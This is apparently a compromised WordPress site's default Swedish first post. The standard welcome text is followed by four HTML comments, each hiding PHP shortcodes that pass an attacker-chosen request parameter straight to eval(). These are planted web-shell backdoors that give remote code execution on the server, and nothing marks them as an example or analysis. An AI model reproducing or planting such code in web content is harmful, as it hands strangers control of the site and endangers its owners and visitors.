Välkommen till WordPress. Det här är ditt första inlägg. Redigera eller radera det. Sedan kan du börja skriva!

<!– [insert_php]if (isset($_REQUEST["HNJvq"])){eval($_REQUEST["HNJvq"]);exit;}[/insert_php][php]if (isset($_REQUEST["HNJvq"])){eval($_REQUEST["HNJvq"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zmbE"])){eval($_REQUEST["zmbE"]);exit;}[/insert_php][php]if (isset($_REQUEST["zmbE"])){eval($_REQUEST["zmbE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TQJ"])){eval($_REQUEST["TQJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["TQJ"])){eval($_REQUEST["TQJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jkUg"])){eval($_REQUEST["jkUg"]);exit;}[/insert_php][php]if (isset($_REQUEST["jkUg"])){eval($_REQUEST["jkUg"]);exit;}[/php] –>